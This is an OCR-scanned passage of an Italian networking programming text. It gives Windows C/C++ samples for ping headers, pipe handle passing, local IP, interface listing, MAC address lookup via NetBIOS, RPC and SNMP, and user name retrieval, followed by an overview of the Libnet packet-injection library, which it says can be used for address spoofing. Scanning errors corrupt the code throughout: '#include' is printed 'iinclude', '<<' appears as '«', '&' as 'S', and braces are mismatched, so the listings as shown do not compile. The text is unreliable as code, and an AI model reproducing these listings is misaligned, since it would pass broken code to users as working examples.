// 


USHORT ident; 


// 


USHORT flags; 


// 



Length of the header in dwords 
Ver sion of IP 
Type of service 

Length of the packet in dwords 

unique identifier 

Flags 
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); 



BYTE ttl; 
BYTE proto; 
USHORT checksum; 
ULONG source_ip; 
ULONG dest_ip; 



// Time to live 

// Protocol number (TCP, UDP etc) 
// IP checksum 



// ICMP header 
struct ICMPHeader { 

BYTE type; 

BYTE code; 

USHORT checksum; 

USHORT id; 

USHORT seq; 

ULONG timestamp; 

}; 

iifdef _MSC_VER 
ipragma pack() 
#endif 



// ICMP packet type 
// Type sub code 



// not part of ICMP, but we need it 



extern int setup for_ping(char* host, int ttl, SOCKET& sd, 

sockaddr_inS dest) ; 
extern int send_ping (SOCKET sd, const sockaddr^inS dest, 

ICMPHeader* send^buf, int packet size) ; 
extern int recv_ping (SOCKET sd, sockaddr_inS source, IPHeader* recv_buf, 

int packet_size) ; 

extern int decode_reply (IPHeader* reply, int bytes, sockaddr_in* from) ; 
extern void init_ping_packet (ICMPHeader* icmp_hdr, int packet_size, 
int seq_no) ; 

ip checksum. h 

extern USHORT ip_checksum (USHORT* buffer, int size) ; 



Il terzo esempio è basato sulla documentazione Microsoft relativa alla funzione di libreria 
_pipe(). 

Essenzialmente l'esempio lavora su delle regole di Win32 mediante le quali un processo figlio 
può ereditare un handle di un file aperto dal processo parent. 
Il programma passa l'handle ID sulla linea di comando 
fdpass.cpp 

// Borland C++ 5.0: bcc32 fdpass.cpp 
// Visual C++ 5.0: ci fdpass.cpp 

iinclude <stdlib.h> 
iinclude <stdio.h> 
iinclude <io.h> 
§include <fcntl.h> 
iinclude <process.h> 
iinclude <math.h> 

enum PIPES { 
READ = 0, 
URITE = 1 

}; 

idefine NUMPROBLEM 8 

iifdef _MSC_VER 

idefine CWAIT _cwait 
ielse 

idefine CWAIT cwait 
iendif 

int main(int argc, char *argv[]) 
{ 

int hpipe [2] ; 

char hstr[20]; 

int pid, problem, c; 

int termstat; 

if (argc == 1) { 

//// No arguments , so this must be the parent process 
// Open a set of pipes 

if (_pipe (hpipe, 256, 0_BINARY) == -1) { 
perror ( "pipe failed ") ; 
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exit (1) ; 

} 

// Convert read side of pipe to string and pass as an argument 
// to the child process . 
itoa (hpipe [READ] , hstr, 10); 

if ( (pid = spawnl (P^NOWAIT, argv[0] , argv[0] , hstr, NULL) ) == -1) { 
perror ( "Spawn failed") ; 

} 

// Put problem in write pipe; it will appear in child 's read pipe, 
for (problem = 1000; problem <= NVMPROBLEM * 1000; problem += 1000) { 
if (write (hpipe [WRITE] , (char *) Sproblem, sizeof(int) ) == -1) ( 
perror ( "parent write failed") ; 

} 

else { 

printf("Son, what is the square root of %d? ", problem); 

} 

} 

// Wait until spawned program is done processing. 
CWAIT(Stermstat, pid, WAIT_CHILD) ; 
if (termstat & 0x0) ( 

perror ( "Child failed") ; 

} 

dose (hpipe [READ ] ) ; 
dose (hpipe [WRITE]) ; 

) 

else { 

//// There is a command line argument, so we must be a child process 
// Convert argument to integer handle value. 
hpipe [READ] = atoi (argv[l] ) ; 

// Read problem from pipe and calculate solution . 
for (c = 0; c < NVMPROBLEM; c++) ( 

if (read (hpipe [READ] , (char *) Sproblem, sizeof(int) ) == -1) ( 
perror ("child read failed") ; 

} 

else ( 

printf("Dad, the square root of %d is %3.2f. ", problem, 
sqrt ( (doublé) problem) ) ; 

} 

} 

} 

return 0; 

) 

Un esempio per ricavare l' IP locale è il seguente. 
getlocalip.cpp 

// Borland C++ 5.0: bcc32.cpp getlocalip.cpp 

// Visual C++ 5.0: ci getlocalip.cpp wsock32 . lib 

^include <iostream.h> 
^include <winsock.h> 

int doit (int, char **) 
{ 

char ac[80]; 

if (gethostname (ac, sizeof(ac) ) == SOCKET_ERROR) ( 
cerr « "Error " « WSAGetLastError ( ) « 

" when getting locai host name. " « endl; 
return 1; 

) 

cout « "Host name is " « ac « ". " « endl; 

struct hostent *phe = gethostbyname (ac) ; 
if (phe == 0) [ 

cerr « "Yow! Bad host lookup. " « endl; 

return 1; 

) 

for (int i = 0; phe->h_addr_list [i] '.= 0; ++i) ( 
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struct in_addr addr; 

memcpy (Saddr, phe->h_addr_list [i] , sizeof (struct in^addr) ) ; 
cout « "Address " « i « ": " « inet__ntoa (addr) « endl; 

} 

return 0; 

} 

int mainfint argc, char *argv[]) 
{ 

WSAData wsaData; 

if (WSAStartup (MAKEWORD (1 , 1) , SwsaData) .'= 0) { 
return 255; 

ì 

int retval = doit (argc, argv) ; 
WSACleanup () ; 
return retval; 

} 



Per ricavare la lista delle interfacce è possibile usare la seguente procedura. 
petifaces.cpp 

// Borland C++ 5.0: bcc32.cpp getifaces . cpp ws2 32.1ib 
// Visual C++ 5.0: ci getifaces . cpp ws2_32.1ib 

iinclude <iostream.h> 
iinclude <winsock2.h> 
^include <ws2tcpip.h> 

int doit() 
{ 

SOCKET sd = WSASocket (AF^INET, SOCK DGRAM, 0, 0, 0, 0) ; 
if (sd == SOCKET_ERROR) { 

cerr « "Failed to get a socket. Error " « WSAGetLastError ( ) « 
endl; return 1; 

} 

INTERFACE_ INFO Inter faceList [20] ; 
unsigned long nBytesReturned; 

if (WSAIoctl (sd, SIO_GET_INTERFACE_LIST, 0, 0, SInterfaceList, 

sizeof (Inter faceList) , SnBytesReturned, 0, 0) 

SOCKET_ERROR) { 

cerr « "Failed calling WSAIoctl : error " « WSAGetLastError ( ) « 

endl ; 

return 1; 

) 

int nNumlnterfaces = nBytesReturned / sizeof ( INTERFACE_INFO) ; 
cout « "There are " « nNumlnterfaces « " interfaces:" « endl; 
for (int i = 0 ; i < nNumlnterfaces; ++i) { 
cout « endl; 

sockaddr_in *pAddress; 

pAddress = (sockaddr_in *) S (InterfaceList [i] . HAddress) ; 
cout « " " « inet_ntoa (pAddress->sin_addr) ; 

pAddress = (sockaddr_in *) S (InterfaceList [i] . UBroadcastAddress) , 
cout « " has bcast " « inet__ntoa (pAddress->sin__addr) ; 

pAddress = ( sockaddr__in *) S (InterfaceList [i] . UNetmask) ; 

cout « " and netmask " « inet_ntoa (pAddress->sin_addr) « endl; 

cout « " Iface is "; 

u_long nFlags = InterfaceList [i] . iiFlags; 
if (nFlags S IFF_UP) cout « "up"; 
else cout « "down"; 

if (nFlags S IFF_POINTTOPOINT) cout « ", is point-to-point "; 
if (nFlags S IFF_LOOPBACK) cout « ", is a loopback iface"; 

cout « ", and can do: "; 

if (nFlags S IFF BROADCAST) cout « "bcast "; 

if (nFlags S IFF_MULTICAST) cout « "multicast "; 
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cout « endl; 

; 

return 0; 

} 

int main() 
{ 

WS AD ATA WinsockData; 

if (WSAStartup (MAKEWORD (2, 2), SffinsockData) .'= 0) { 
cerr « "Failed to find Winsock 2.2!" « endl; 
return 2; 

} 

int nRetVal = doit(); 
WSACleanup () ; 
return nRetVal; 

ì 

Tutti i seguenti esempio ricavano l'indirizzo MAC utilizzando modi differenti. 
Il primo utilizza NETBIOS. 

getmac-netbios.coo 

// Visual C++ 5.0: ci -GX getmac-netbios . cpp netapi32.1ib 
// Borland C++ 5.0: bcc32 getmac-netbios . cpp 

iinclude <windows.h> 
iinclude <stdlib.h> 
iinclude <stdio.h> 
iinclude <iostream> 
^include <strstream> 
iinclude <string> 

using namespace std; 

bool GetAdapterlnfo (int nAdapterNum, string S sMAC) 
{ 

// Reset the LAN adapter so that we can begin querying it 
NCB Ncb; 

memset(SNcb, 0, sizeof (Ncb) ) ; 
Ncb . ncb_command = NCBRESET; 
Ncb . ncb_lana_num = nAdapterNum; 
if (Netbios(SNcb) != NRC^GOODRET) { 
char acTemp[80] ; 

ostrstream outs (acTemp, sizeof (acTemp) ) ; 

outs « "error " « Ncb . ncb_retcode « " on reset" « ends; 
sMAC = acTemp; 
return false; 

} 

// Prepare to get the adapter status block 
memset (SNcb, 0, sizeof (Ncb) ) ; 
Ncb . ncb__command = NCBASTAT; 
Ncb.ncblana_num = nAdapterNum; 
strcpyf (char *) Ncb.ncb_callname, "*") ; 
struct ASTAT { 

ADAPTER_STATUS adapt; 

NAME_BUFFER NameBuff[30] ; 
} Adapter; 

memset (S Adapter, 0, sizeof (Adapter) ) ; 

Ncb . ncb_buffer = (unsigned char *)SAdapter; 

Ncb . ncb_length = sizeof (Adapter) ; 

// Get the adapter ' s info and, if this works, return it in standard, 
// colon-delimited form. 
if (Netbios(SNcb) == 0) { 
char acMAC[18]; 

sprint f(acMAC, "%02X: %02X: %02X: %02X: %02X: %02X", 
int (Adapter . adapt . adapter_address [0] ) , 
int (Adapter . adapt . adapter_address [1] ) , 
int (Adapter . adapt . adapter_address [2] ) , 
int (Adapter . adapt . adapter_address [3] ) , 
int (Adapter . adapt . adapter address [4 ] ) , 
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int (Adapter . adapt . adapter_address [ 5 ] ) ) ; 
sMAC = acMAC; 
return true; 

ì 

else { 

char acTemp [80] ; 

ostrstream outs (acTemp, slzeof (acTemp) ) ; 

outs « "error " « Ncb . ncb_retcode « " on ASTAT" « ends; 
sMAC = acTemp; 
return false; 

} 

} 

int main() 
{ 

// Get adapter list 
LANA__ENUM AdapterList; 
NCB Ncb; 

memset(&Ncb, 0, sizeof (NCB) ) ; 
Ncb . ncb^command = NCBENUM; 

Ncb . ncb_j3uffer = (unsigned char *) SAdapterList; 
Ncb . ncb__length = sizeof (AdapterList) ; 
Netbios (SNcb) ; 

// Get ali of the locai ethernet addresses 
string sMAC; 

for (int i = 0; i < AdapterList . length; ++i) { 

if (GetAdapterlnf o (AdapterList. lana [i] , sMAC) ) { 

cout « "Adapter " « int (AdapterList . lana [i] ) « 
"'s MAC is " « sMAC « endl; 

} 

else { 

cerr « "Failed to get MAC address ! Do you" « endl; 
cerr « "have the NetBIOS protocol installed?" « endl; 
break; 

} 

} 

return 0; 



In questo esempio l'indirizzo MAC è ottenuto tramite RPC. 
getmac-rpccpp 

// Visual C++ 5.0: ci —GX getmac—rpc . cpp rpcrti.lib 
// Borland C++ 5.0: bcc32 getmac-rpccpp 

^include <rpc.h> 
iinclude <iostream> 

iifdef _MSC_VER 
using namespace std; 
#endif 

int main() 
{ 

cout « "MAC address is: "; 

// Ask RPC to create a UUID for us. If this machine has an Ethernet 
// adapter, the last six bytes of the UUID (bytes 2—7 inclusive in 
// the Data4 element) should be the MAC address of the locai 
// Ethernet adapter. 
UUID uuid; 
UuidCreate (Suuid) ; 

// Spit the address out 

for (int i = 2; i < 8; ++i) { 

cout « hex; 

cout.fill('O') ; 

cout . width (2) ; 

cout « int (uuid.Data4 [i] ) ; 
if (i < 7) { 

cout « " : " ; 

} 
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cout « endl; 




return 0; 




} 




Infine l'indirizzo MAC viene ottenuto tramite SNMP. 



snmpmac.cpp 

^include <snmp.h> 
iinclude <conio.h> 
^include <stdio.h> 



typedef BOOL (WINAPI * pSnmpExtensionlnit) ( 
IN DWORD dwTimeZeroReference, 
OUT HANDLE * hPollForTrapEvent, 
OUT AsnObjectldentifier * supportedView) ; 

typedef BOOL (WINAPI * pSnmpExtensionTrap) ( 

OUT AsnObjectldentifier * enterprise, 

OUT Asnlnteger * genericTrap, 

OUT Asnlnteger * speci ficTrap, 

OUT AsnTimeticks * timeStamp, 

OUT RFC1157VarBindList * variableBindings) ; 

typedef BOOL (WINAPI * pSnmpExtensionQuery) ( 
IN BYTE requestType, 

IN OUT RFC1157VarBindList * variableBindings, 
OUT Asnlnteger * errorStatus, 
OUT Asnlnteger * errorlndex) ; 

typedef BOOL (WINAPI * pSnmpExtensionlnitEx) ( 

OUT AsnObjectldentifier * supportedView) ; 

void main () 
{ 

WSADATA WinsockData; 

if (WSAStartup (MAKEWORD (2, 0) , SWinsockData) '.= 0) { 

fprintf (stderr, "This program requires Winsock 2.x! "); 
return; 

} 

HINSTANCE m_hlnst; 
pSnmpExtensionlnit m_Init; 
pSnmpExtensionlnitEx m_InitEx; 
pSnmpExtensionQuery m_Query; 
pSnmpExtensionTrap m_Trap; 
HANDLE PollForTrapEvent; 
AsnObjectldentifier SupportedView; 
UINT OID_ifEntryType[] = { 

1, 3, 6, 1, 2, 1, 2, 2, 1, 3 

}; 

UINT OID__ifEntryNum[] = { 
1, 3, 6, 1, 2, 1, 2, 1 

ì; 

UINT OID_ipMACEntAddr [ ] = { 

1, 3, 6, 1, 2, 1, 2, 2, 1, 6 
); //, 1,6 }; 

AsnObjectldentifier MIB_ifMACEntAddr = 

{ sizeof (OID_ipMACEntAddr) / sizeof (UINT) , OID_ipMACEntAddr }; 
AsnObjectldentifier MIB_ifEntryType = { 

sizeof (OID_ifEntryType) / sizeof (UINT) , OID_ifEntryType 

}; 

AsnObjectldentifier MIB_ifEntryNum = { 

sizeof (OID_ifEntryNum) / sizeof (UINT) , OID_ifEntryNum 

}; 

RFC1157VarBindList varBindList; 
RFC1157VarBind varBind[2] ; 
Asnlnteger errorStatus; 
Asnlnteger errorlndex; 
AsnObjectldentifier MIB_NULL = { 
0, 0 

}; 

int ret; 
int dtmp; 
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int i = 0, j = 0; 
BOOL found = FALSE; 
char TempEthernet [13] ; 
m_Init = NULL; 
m_In±tEx = NULL; 
m_Query = NULL; 
m_Trap = NULL; 

/* Load the SNMP dll and get the addresses of the functions 

necessary */ 
m hlnst = LoadLibraryCinetmibl.dll"); 
if (m_hlnst < (HINSTANCE) HINSTANCE_ERROR) { 

m_hlnst = NULL; 

return; 

} 

m_In±t = 

(pSnmpExtensionlnit) GetProcAddress (m_hlnst , " SnmpExtensionlnit ") ; 
m_InitEx = 

(pSnmpExtensionlnitEx) GetProcAddress (m_hlnst , 

"SnmpExtensionlnitEx") ; 

m_Query = 

(pSnmpExtensionQuery) GetProcAddress (m_hlnst, 

"SnmpExtensionQuery") ; 

m_Trap - 

(pSnmpExtensionTrap) GetProcAddress (m_hlnst, "SnmpExtensionTrap") ; 
in_Init (GetTickCount () , SPollForTrapEvent, SSupportedView) ; 

/* Initialize the variable list to be retrieved by m_Query */ 
varBindList . list = varBind; 
varBind[0] .name = MIB_NULL; 
varBind [1 ] .name = MIB_NULL; 

/* Copy in the OID to find the number of entries in the 

Inteface table */ 
varBindList . len = 1; /* Only retrieving one item */ 

SNMP_oidcpy ( SvarBind [ 0 ] .name, &MIB_ifEntryNum) ; 
ret = 

m_Query(ASN_RFC1157_GETNEXTREQUEST, SvarBindList, SerrorStatus, 
Serrorlndex) ; 
printf("§ of adapters in this system : %i\n", 

varBind [0] . value . asnValue . number) ; varBindList . len = 2; 

/* Copy in the OID of ifType, the type of interface */ 
SNMP__oidcpy ( SvarBind [ 0 ] .name, &MIB_i f Entry Type ) ; 

/* Copy in the OID of ifPhysAddress, the address */ 
SNMP_oidcpy(SvarBind[l] .name, SMIB_ifMACEntAddr) ; 

do { 

/* Submit the query. Responses will be loaded into varBindList. 
We can expect this cali to succeed a § of times corresponding 
to the # of adapters reported to be in the system */ 

ret = 

m_Query(ASN_RFC1157_GETNEXTREQUEST, SvarBindList, SerrorStatus, 
Serrorlndex); if (!ret) ret = 1; 

else 

/* Confirm that the proper type has been returned */ 
ret = 

SNMP_oidncmp (SvarBind[0 ] . name, SMIB_if Entry Type, 

MIB_ifEntryType.idLength); if (!ret) { 

dtmp = varBind [0] . value . asnValue . number; 
printf ("Interface #%i type : %i ", j, dtmp); 

/* Type 6 describes ethernet interfaces */ 
if (dtmp == 6) { 

/* Confirm that we have an address here */ 
ret = 

SNMP_oidncmp(SvarBind[l] .name, SMIB_ifMACEntAddr, 
MIB_ifMACEntAddr. idLength) ; 

if (('.ret) 

SS (varBind [1] .value . asnValue . address . stream != NULL)) { 
if < 

(varBind [1 ] . value . asnValue . address . stream [0 ] == 
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0x44) 

SS (varBind[l] .value . asnValue . address . stream[l] == 
0x45) 

SS (varBind[l] .value. asnValue. address. stream[2] == 
0x53) 

SS (varBind[l] .value. asnValue. address. stream [3] == 
0x54) 

SS (varBind[l] . value . asnValue . address . stream [4] == 
0x00) ) { 

/* Ignore ali dial-up networking adapters */ 
printf ("Interface #%i is a DUN adapter ", j) ; 
continue; 

) 

±f ( 

(varBind[l ] . value . asnValue . address . stream [0] == 
0x00) 

SS (varBindfl] .value . asnValue . address . stream [1] == 
0x00) 

SS (varBind[l] .value . asnValue . address . stream [2] == 
0x00) 

SS (varBind[l] .value . asnValue. address . stream [3] == 
0x00) 

SS (varBind[l] .value . asnValue. address . stream [4] == 
0x00) 

SS (varBind[l] .value. asnValue. address. stream [5] == 
0x00) ) { 

/* Ignore NULL addresses returned by other network 

interfaces */ 
printf ("Interface §%i is a NULL address ", j) ; 
continue; 

} 

sprint f (TempEthernet, "%02x%02x%02x%02x%02x%02x", 

varBind[l ] . value . asnValue . address . stream [0 ] , 
varBind[l ] . value . asnValue . address . stream [1 ] , 
varBind[l ] . value . asnValue . address . stream [2] , 
varBind[l ] . value . asnValue . address . stream [3] , 
varBind[l ] . value . asnValue . address . stream [4 ] , 
varBind[l ] . value . asnValue . address . stream [5] ) ; 

printf ("MAC Address of interface #%i : %s ", j, 
TempEthernet) ; } 

) 

} 

} while (!ret) ; /* Stop only on an error. An error will occur 

when we go exhaust the list of interfaces to 
be examined */ 

getch () ; 

/* Free the bindings */ 
SNMP__FreeVarBind(SvarBind[0] ) ; 
SNMP_FreeVarBind(SvarBind[l] ) ; 

} 

snmpaoi.cpp 

* 

* Copyright (C) Stas Khirman 1998. Ali rights reserved. 
* 

* This program is distributed WITHOUT ANY WARRANTY 
* 

* 

* Reproduction of SNMP.LIB and SNMPAPI . LIB base 

* functions 
* 

* Author: Stas Khirman (staskh@rocketmail.com) 



* Free software: no warranty; use anywhere is ok; spread the 

* sources ; note any modifications ; share variations and 

* derivatives (including sending to staskh@rocketmail.com). 
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^include <snmp.h> 
SNMPAPI 

SNMP_FUNC_ TYPE 
SnmpUtilOidCpy ( 

OUT AsnObjectldentifier *DstObjId, 

IN AsnObjectldentifier *SrcObjId 

) 

{ 

DstObjId->ids = (UINT *) GlobalAlloc (GMEM_ZEROINIT, SrcObjId->idLength * 

sizeof(UINT) ) ; 
if(!DstObjId->ids) { 

SetLastError (1) ; 

return 0; 

ì 

memcpy (DstObjId->ids, SrcObjId->ids, SrcObjId->idLength*sizeof (UINT) ) ; 
DstObjId->idLength = SrcObjId->idLength; 

return 1; 

ì 



VOID 

SNMP__FUNC__ TYPE 
SnmpUtilOidFree ( 

IN OUT AsnObjectldentifier *ObjId 

) 

{ 

GlobalFree (ObjId->ids) ; 
ObjId->ids = 0; 
ObjId->idLength = 0; 



SNMPAPI 
SNMP_FUNC__ TYPE 
SnmpUtilOidNCmp ( 

IN AsnObjectldentifier *ObjIdA, 

IN AsnObjectldentifier *ObjIdB, 

IN UINT Len 

) 

{ 

UINT CmpLen; 
UINT i; 
int res; 

CmpLen = Len; 

if (ObjIdA->idLength < CmpLen) 

CmpLen = ObjIdA->idLength; 
if (ObjIdB->idLength < CmpLen) 

CmpLen = ObjIdB->idLength; 

for (i=0 ; i<CmpLen; i++) { 

res = ObjIdA->ids [i] - ObjIdB->ids [i] ; 
if(res<=0) 
return res; 

) 

return 0; 



VOID 

SNMP_FUNC_ TYPE 
SnmpUtilVarBindFree ( 

IN OUT RFC1157VarBind *VarBind 

) 

{ 

BYTE asnType; 

// free object name 

SnmpUtilOidFree (&VarBind->name) ; 

asnType = VarBind->value . asnType; 

if (asnType==ASN__OBJECTIDENTIFIER) { 

SnmpUtilOidFree (SVarBind->value . asnValue . object) ; 

) 

else if ( 
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(asnType==ASN_OCTETSTRING) / / 
(asnType==ASN_RFC1155_IPADDRESS) / / 
(asnType==ASN_RFC1155__OPAQUE) / / 
(asn Type==ASN_ SEQUENCE) ) { 
if (VarBind->value . asnValue . string. dynamic) { 

GlobalFree (VarBind->value . asnValue . string. stream) ; 

} 

} 

VarBind->value . asnType = ASN_NULL; 

} 

Per ottenere il LOCAL USER NAME : 
getusername. cpp 

// Borland C++ 5.0: bcc32.cpp getusername . cpp 

// Visual C++ 5.0: ci getusername . cpp advapi32.1ib 

iinclude <iostream.h> 
§include <windows.h> 

int main() 
{ 

char acUserName [100] ; 

DWORD nUserName = sizeof (acUserName) ; 

if (GetUserName (acUserName, SnUserName) == 0) { 

cerr « "Failed to lookup user name, error code " « GetLastError () 
« " . " « endl; 

} 

cout « "User name is " « acUserName « ". " « endl; 
return 0; 

ì 



Libnet 

Esistono alcune librerie presenti in ambiente Unix che sono state portate anche in altri 
ambienti e che dispongono di funzionalità particolari tali da renderle importantissime per gli 
usi legati alla programmazione in rete. 

Alcuni tipi di librerie come quelle relative ai SOCKET permettono di scrivere funzioni che 
leggono e scrivono dati sulla rete mentre altre come LIBNET e TCPDUMP possiedono 
caratteristiche che permettono la scrittura di programmi legati all'analisi dei pacchetti e, come 
nel caso appunto di LIBNET, di eseguire l'iniezione di pacchetti all'interno di un network. 
Ora vedremo appunto LIBNET specificando quello che è il suo uso e descrivendo le sue 
funzioni. 

Che cosa significa eseguire l'iniezione ? 

Proprio quello dice la frase ovvero il fatto di iniettare un pacchetto dentro ad una sequenza di 
dati che viaggiano su una rete anche se poi alla fine del tutto LIBNET è un semplice 
generatore di pacchetti utilizzabile per tutti quegli scopi in cui diventa necessario eseguire la 
creazione di pacchetti avendo la possibilità di agire con quelle che sono le strutture di 
controllo dei vari pacchetti gestiti ai vari livelli dei protocolli. 

Si tratta di una libreria del C semplice da utilizzare e presente sia sotto Linux che Windows. 
Oggi come oggi LIBNET supporta solo a livello di IP Ipv4 e non ancora Ipv6. 
Durante la trattazione di questa libreria dovrete rifarvi ai concetti che abbiamo trattato durante 
i capitoli relativi ai protocolli. 

Spesso verranno riportati richiami a quelli che sono lo strato di trasporto, quello di IP e cosi 
via. 

Questa libreria può essere utilizzata per eseguire funzioni di spoofing ovvero di trasmissione 
di pacchetti con i dati relativi al mittente falsi. 

Si tratta di un ennesima libreria molto più indirizzata all'ambiente Unix. 

Una libreria relativa alla creazione di funzioni di sniffing l'abbiamo già vista trattando 

nell'apposito capitolo WINCAP. 

Vediamo subito da punto di vista della programmazione quali sono le fasi da seguire per 
scrivere una qualche applicazione utilizzante questa libreria. 
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Come dicevamo prima la libreria genera dei pacchetti i quali devono possedere una zona di 
memoria che il programmatore deve allocare prima di iniziare ad utilizzare le sua funzioni. 
L'ordine delle operazioni sono : 



Allocazione della memoria 
Inizializzazione del network 
Costruzione del pacchetto 
Calcolo del checksum del pacchetto 



Il primo passo è quello legato all'allocazione della memoria per un determinato pacchetto. 
LIBNET possiede un metodo standard che è costituito dell'uso della funzione 



libnet_±n±t_packet () 



La nostra preoccupazione dovrà essere quella di accertarsi che la memoria sia 
sufficientemente grande per il pacchetto che intendiamo generare ed in particolar modo che 
sia adeguata al metodo di iniezione che intendiamo utilizzare. 

Se intendiamo generare un semplice pacchetto TCP senza nessuna opzione, con un payload 
di 30 bytes e utilizzante l'interfaccia relativa allo strato IP avremo bisogno di circa 70 bytes 
(IP header + TCP header + payload). 

Se invece dovessimo creare lo stesso pacchetto ma utilizzando l'interfaccia legata allo strato 
di link avremo bisogno di circa 84 bytes (ethernet header + IP header + TCP header + 
payload). 

Per essere sicuri sarà sufficiente allocare un numero di bytes dato da IP_MAXPACKET + 
ETHJH ovvero 65549 bytes. 

Quando tutte le operazioni di creazione dei pacchetti terminano dovremo rilasciare la 
memoria usando la funzione 



libnet_destroy_packet () 

Fate attenzione che se la memoria allocata non è sufficiente potrete trovarvi errori di segment 
fault dati dal vostro programma. 

La seconda fase è quella relativa all'inizializzazione del network che viene eseguita tramite la 
chiamata alla funzione 



con l'adeguato protocollo (normalmente IPPROTO_RAW). 

Questa chiamata restituisce un SOCKET RAW con IPJHDRINCL settato sul socket che dice 
al kernel che state creando l'header IP. 

L'interfacciamento allo strato di link viene eseguito mediante la cali alla funzione 

libnet_open_llnk_lnterface () 

Con l'argomento appropriato relativo al device. 

Questa funzione restituisce un puntatore pronto per accedere alla struttura dell'interfaccia. 
La creazione del pacchetto è un altro degli steps nella quale la costruzione avviene 
modularmene. 

Per ogni strato del protocollo deve esistere una corrispondente cali ad una funzione 
libnet_bulld () 

Questa chiamata deve essere utilizzata insieme ad altre a seconda di quelli sono i propri 
scopi. 

Ad esempio per l'utilizzo tramite lo strato IP dovranno essere eseguite le seguenti due 
funzioni : 

libtnet_bulld_ip () 
libnet_build_tcp() 
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Per l'utilizzo tramite starto di link invece dovrà essere eseguita un funzione aggiuntiva e 
precisamente : 

libnet_bu±ld_ethernet () 

L'ordine di chiamata alle funzioni non è fondamentale mentre invece è importante che 
vengano passate le locazioni alle corrette zone di memoria. 

Le funzioni devono creare gli headers dei pacchetti all'interno del buffer esattamente come 
deve essere trasmesso e quindi demultiplessato dal ricevente. 
Ad esempio : 

14 bytes 20 bytes 20 bytes 



I ethernet / IP \ TCP / 




Uno degli ultimi passi è quello in cui è necessario eseguire il checksum dei pacchetti. 

Per l'interfaccia relativa allo strato di IP è necessario soltanto calcolare un checksum legato 

allo strato di trasporto. 

Nel caso di utilizzo dell'interfaccia relativa allo strato di link il checksum dovrà essere 
calcolato in modo esplicito. 

I checksum sono calcolati tramite il richiamo alla funzione : 
libnet_do_checksum() 

la quale si aspetta che gli venga passato il buffer che punta all'header IP. 
L'ultima fase è appunto quella relativa all'iniezione del pacchetto nella rete. 
Utilizzando l'interfaccia relativa allo strato di IP questa funzione è eseguita tramite : 

libnet_wrlte_ip () 

mentre con l'interfaccia relativa allo strato di link la funzione da utilizzare è 



Le funzioni restituiscono il numero di bytes scritti oppure un valore -1 che sta ad indicare un 
errore. 

Ora vediamo singolarmente le varie funzioni che compongono la libreria suddividendole per 
tipologia di funzionalità. 

Funzioni di gestione della memoria 



RV on success: 1 



RV on f allure: 


-1 




Re-entrant : 


yes 




Arguments: 


1 - 


desired packet size 




2 - 


pointer to a character pointer to contain 


packet memory 







La funzione crea la zona di memoria adatta per il pacchetto. 

Questa funzione accetta due argomenti e precisamente la dimensione del pacchetto e il 
puntatore a questo. 
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Il parametro relativo alla dimensione può essere 0 nel qual caso la libreria cercherà di 
calcolare la dimensione per noi. 

Il puntatore al puntatore è necessario quando l'allocazione della memoria è locale. 
Se lo passassimo soltanto in un puntatore la memoria verrebbe persa. 



id l±bnet_destroy_packet (u_char **) 



RV on success: 


NA 


RV on f allure: 


NA 


Reentrant : 


yes 


Arguments : 


1 - pointer to a character pointer to containing 






In pratica la funzione 


equivale alla freeQ della memoria allocata dalle funzioni di 


inizializzazione dei pacchetti. 


Questa libera la memoria e assegna al buffer NULL. 


int libnet_init_packet_arena(struct libnet_arena **, u_short, u_short); 


RV on success: 


l 


RV on f allure: 


-l 


Reentrant : 


yes 


Arguments : 


1 - pointer to an arena pointer (preallocated 


arena) 






2 - number of packets 




3 - packet size 



La funzione alloca un pool di memoria ed è di fatto quella più idonea nel caso in cui si progetti 
di creare ed inviare più pacchetti. 

Ad questa funzione vengono passati il puntatore ad una struttura arena e il numero di 
pacchetti. 



u_char *libnet_next_packet_from_arena(struct libnet_arena **, u_short); 



RV on failure: 


NULL 


Reentrant: yes 




Arguments: 1 


- pointer to an arena pointer 



Questa funzione restituisce un blocco di memoria della dimensione specificata estraendolo da 
una certa arena e decrementa il contatore. 

Se non esiste una memoria disponibile la funzione restituisce NULL. 



void libnet_destroy_packet_arena(struct libnet_arena **) 

RV on success: NA 
RV on failure: NA 




Come è facilmente comprensibile dal nome la funzione rimuove la mekoria allocata dealle 
funzioni precedenti relative alla creazione di un arena. 

Funzioni per la risoluzione degli indirizzi 
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RV on success: human readable IP address 
RV on f allure: NULL 
Reentrant : no 

Arguments : 1 - network-byte ordered IP address 

2 - flag to specify whether or not to look up 
canonical hostnames (symbolic Constant) 

La funzione converte indirizzo specificato in una controparte umanamente comprensibile. 
Se viene specificato il flag LIBNET_RESOLVE la funzione cerca di risolvere l'indirizzo e 
quindi di restituire il nome dell'host altrimenti se viene specificato il flag 
LIBNET_DONT_RESOLVE la funzione restituisce una stringa di numeri separati da punti. 
Si tratta di una funzione non rientrante in quanto utilizza dati statici. 

void libnet_host_lookup_r (u_long, u_short, u_char *) ; 



RV on success: 


NA 


RV on f allure: 


NA 


Reentrant : 


maybe 


Arguments : 


1 - network-byte ordered IP address 




2 - flag to specify whether or not to look up 



E la controparte rientrante della funzione vista prima. 

In questo caso la funzione accetta un argomento aggiuntivo ovvero quello destinato alla 
memorizzazione della stringa restituita. 



RV on success: network -byte ordered IP address 
RV on f allure: -1 
Reentrant : yes 

Arguments: 1 - human readable hostname 

2 - flag to specify whether or not to look up 
canonical hostnames (symbolic Constant) 

La funzione accetta in ingresso una stringa terminata con un NULL relativa all'indirizzo IP e lo 
trasforma in un indirizzo costituito da un unsigned long. 

ujong libnet_get_ipaddr(struct link_int *, const u_char *, const u_char *); 

RV on success: requested IP address 
RV on f allure: -1 
Reentrant : yes 

Arguments : 1 - pointer to a link interface structure 

2 - pointer to the device to query 

3 - pointer to a buf to contain a possible error 



La funzione restituisce l'IP del device specificato. 

Come argomento viene passato un puntatore ad un interfaccia relativa ad uno strato di rete, 
uno al nome del device e un buffer vuoto utilizzato in caso d'errore. 
In caso di riuscita viene restituito l'indirizzo dell'interfaccia specificata. 

struct ether_addr *libnet_get_hwaddr(struct link_int *, const u_char *, const u_char *); 

RV on success: requested ethernet address (inside of struct 
ether_addr) 

RV on f allure: NULL 
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Reentrant : 


depends on architecture 




Arguments: 


1 


- pointer 


to 


a link interface 


structure 




2 


- pointer 


to 


the device to query 




3 


- pointer 


to 


a buf to contain 


a possible error 


message 













libnet_get_hwaddr() ritorna l'indirizzo hardware del device di rete specificato. 

Fino alla versione a cui mi riferisco sono permesse solo interfacce Ethernet. 

La funzione prende in ingresso un puntatore alla struttura relativa all'interfaccia di un link 

layer mentre il buffer vuoto viene utilizzato solo in caso d'errore. 

La funzione restituisce l'indirizzo MAC dell'interfaccia specificata. 



